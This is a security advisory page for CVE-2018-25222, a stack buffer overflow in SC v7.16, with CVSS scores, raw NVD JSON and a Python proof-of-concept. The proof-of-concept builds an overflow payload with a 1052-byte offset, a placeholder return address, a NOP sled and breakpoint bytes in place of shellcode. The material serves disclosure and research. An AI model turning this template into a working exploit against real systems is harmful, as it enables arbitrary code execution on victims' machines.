Security Vulnerability Report
CVE-2018-25222 CVSS 8.4 HIGH

Published: 2026-03-28 12:16:03
Last Modified: 2026-05-01 14:41:28

Description

SC v7.16 contains a stack-based buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying oversized input that exceeds buffer boundaries. Attackers can craft malicious input strings exceeding 1052 bytes to overwrite the instruction pointer and execute shellcode in the application context.

CVSS Details

CVSS Score: 8.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

SC v7.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# PoC for CVE-2018-25222 Stack Based Buffer Overflow

# Buffer overflow offset calculated at 1052 bytes
offset = 1052

# Placeholder for return address (EIP overwrite)
# Actual address needs to be determined via debugging
ret_addr = b"\x41\x41\x41\x41"

# NOP sled to increase reliability
nop_sled = b"\x90" * 32

# Placeholder where shellcode would go: 100 INT3 (0xCC) breakpoint bytes, not a working payload
# Warning: For educational purposes only
shellcode = b"\xCC" * 100

# Construct the payload
payload = b"A" * offset + ret_addr + nop_sled + shellcode

try:
    # Write payload to file
    with open("cve_2018_25222_poc.txt", "wb") as f:
        f.write(payload)
    print("[+] Payload generated successfully.")
    print("[+] Payload length: {} bytes".format(len(payload)))
except Exception as e:
    print("[-] Error generating payload: {}".format(e))
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2018-25222", "sourceIdentifier": "[email protected]", "published": "2026-03-28T12:16:02.983", "lastModified": "2026-05-01T14:41:28.180", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SC v7.16 contains a stack-based buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying oversized input that exceeds buffer boundaries. Attackers can craft malicious input strings exceeding 1052 bytes to overwrite the instruction pointer and execute shellcode in the application context."}, {"lang": "es", "value": "SC v7.16 contiene una vulnerabilidad de desbordamiento de búfer basado en pila que permite a atacantes locales ejecutar código arbitrario al proporcionar una entrada sobredimensionada que excede los límites del búfer. Los atacantes pueden crear cadenas de entrada maliciosas que excedan los 1052 bytes para sobrescribir el puntero de instrucción y ejecutar shellcode en el contexto de la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", 
"modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/44279", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/sc-stack-based-buffer-overflow-remote-code-execution", "source": "[email protected]"}]}}